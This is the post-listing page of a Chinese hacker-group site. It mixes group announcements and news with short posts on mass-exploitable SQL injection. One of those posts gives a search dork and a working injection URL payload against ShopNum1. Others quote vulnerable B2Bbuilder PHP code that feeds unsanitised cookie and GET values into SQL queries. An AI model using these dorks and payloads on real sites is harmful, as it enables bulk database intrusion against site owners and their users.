中国红客帝国官方网站 站长QQ:303404076
    24小时排行
  • 最新
  • 热门
  • 冷门
  • 随机

置顶推荐

      红客帝国是当前国内为数不多的民间网络信息安全研究团队之一。作为专业的安全技术交流平台,红客帝国何盈利与商业性质,本着“低调求发展”的理念、在严格遵守国家法律的前提下低调和谐健康发展,其浓厚的讨论氛围,广泛的研究范围,令不少安全爱好者神往! 红客帝国严格控制团队成员的加入,目前活跃在红客帝国里的成员大多是国内各大互联网公司、各大网络安全公司的网络安全工程师,以及国内各大院校的对网络安全感兴趣的大学生。大家团结在红客帝国共同提高,实现自己的理想。     红客帝国欢迎您的加入! 任何事项请联系官方邮箱:[email protected](官方邮箱申请联系QQ:303404076) &n...

最近更新

红客帝国欢迎你的加入

  红客帝国是当前国内为数不多的民间网络信息安全研究团队之一。作为专业的安全技术交流平台,红客帝国何盈利与商业性质,本着“低调求发展”的理念、在严格遵守国家法律的前提下低调和谐健康发展,其浓厚的讨论氛围,广泛的研究范围,令不少安全爱好者神往! 红客帝国严格控制团队成员的加入,目前活跃在红客帝国里的成员大多是国内各大互联网公司、各大网络安全公司的网络安全工程师,以及国内各大院校的对网络安全感兴趣的大学生。大家团结在红客帝国共同提高,实现自己的理想。     红客帝国欢迎您的加入! 任何事项请联系官方邮箱:[email protected](官方邮箱申请联系QQ:303404076)   官方群如下:7600711    479560186&nbs...

2015-3-16 21:22 Monday Comments:2
一款不错的黑客游戏

这是一款不错的黑客游戏 真实模拟黑客技术 本屌已经内附攻略 不会的自己看 下载地址:http://share.weiyun.com/7a0709cd6cc98fed7dd862b6b39bf821

2016-6-2 0:45 Thursday Comments:0标签: 黑客游戏
匿名者-为2016年最活跃黑客组织

根据SurfWatch Labs最新公布的一份调查报告显示,匿名者(Anonymous)在黑客组织热门榜中仍旧保持领先地位,紧随其后的为Turk Hakc Team、New World Hacking、Ghost Squad Hackers。相关数据披露,虽然黑客组织在近几年来的行动有所放缓,但由其带来的危害仍旧足够引起主流媒体的注意。 SurfWatch称,政府机构是受黑客网络攻击最严重的区域,其中该类型大规模行动来自匿名者菲律宾分支COMELEC和Lulzsec菲律宾分支,他们曾泄露了近5000万名菲律宾选民的信息。     而这些黑客组织在今年年初对BBC发起的DDoS攻击、对美国总统竞选人特朗普发起的#OpTraump运动、对希腊央行等大型银行发起的DDoS攻击以及对日产发起的#OpKil...

2016-6-1 9:19 Wednesday Comments:0
Struts2的批量教程

此教程属于基础教程 但是也是和广大刷洞的白帽子 我个人的批量方法 大牛勿喷!! 教程下载地址: http://share.weiyun.com/458b20003437d75c7e20241c12c1a786

2016-5-29 15:59 Sunday Comments:0标签: Struts2
ShopNum1 某处通用SQL漏洞可批量

关键词:inurl:ProductListCategory.aspx BrandGuid参数过滤不严导致注入。 利用方式: http://site/ProductListCategory.aspx?ProductCategoryID=38&BrandGuid=18e018b8-c0c7-4f95-b1fc-0a15d36a8b7d' and 1=char(sys.fn_varbintohexstr(hashbytes('MD5','1'))) and '1'='1 Pocsuite证明:

2016-5-28 19:41 Saturday Comments:0标签: 通用SQL注入
B2Bbuilder网上商城通用注入漏洞可以批量【四 五】

注入4&5此处有两个地方可以注入。 看到module\message\inquiry_basket.php if(!empty($_COOKIE['com_inquery']))   {       $sql="select company,ctype as subject,admin as userid from ".COMPANY." where admin in ($_COOKIE[com_inquery])";  //注入4       $db->query($sql);       $re=$db->getRows();       $...

2016-5-28 19:35 Saturday Comments:0标签: 通用SQL注入
B2Bbuilder网上商城通用注入漏洞可以批量【二】

看到module\buy\admin\add_cart.php if(!empty($_POST["cat"])&&!empty($_GET["id"]))   {          $ext_table=$config['table_pre'].'defind_'.$_POST['ext_field_cat'];       $_POST['ext_field_cat']*=1;           if($_POST['pid']!=0) &nb...

2016-5-28 19:29 Saturday Comments:0标签: 通用SQL注入
B2Bbuilder网上商城通用注入漏洞可以批量【三】

看到\module\company\space_mail.php if(!empty($_GET['tid'])&&is_array($_GET['tid']))       $tid=implode(',',$_GET['tid']);   elseif(!empty($_GET['tid']))       $tid=$_GET['tid'];   if(!empty($tid))   {       $sql="select id,ti...

2016-5-28 19:25 Saturday Comments:0标签: 通用SQL注入
B2Bbuilder网上商城通用注入漏洞【一】

<?php   $status=array('-1'=>lang_show('notpass'),'0'=>lang_show('wpass'),'1'=>lang_show('auditpass'));   if(isset($_GET['step']))   {       if($_GET['step']=="del")       {           $db->query("delete from ".CER...

2016-5-28 19:14 Saturday Comments:0标签: 通用SQL注入
StrongSoft灾害预警系统 stationName参数通用SQL注入

StrongSoft灾害预警系统  stationName 参数SQL注入漏洞。

2016-5-28 19:12 Saturday Comments:0标签: 通用SQL注入
红客帝国已在漏洞盒子建立组织

红客帝国已经在漏洞盒子创立组织 欢迎各位大牛白帽子入住 https://www.vulbox.com/user/team-manage 欢迎各位漏洞盒子大牛加入 登录漏洞盒子 点击团队 搜索红客帝国  希望大家一起刷洞 无法 在这里跪谢了

2016-5-23 17:36 Monday Comments:0标签: 漏洞盒子
安装py环境在py环境中安装sqlmap

sqlmap是一个开放源码的sql注入渗透测试工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,目前支持Access、mssql、mysql、oracle、postgresql多种数据库类型。sqlmap采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时执行任意命令。 网络爱好者无悔投稿 sqlmap大小:39.38MB | 来源:微云 已经过安全软件检测无毒,请您放心下载。

2016-5-13 9:03 Friday Comments:0
1 2 3 4 5 6 ... »
Power By H.E.C
    120.47ms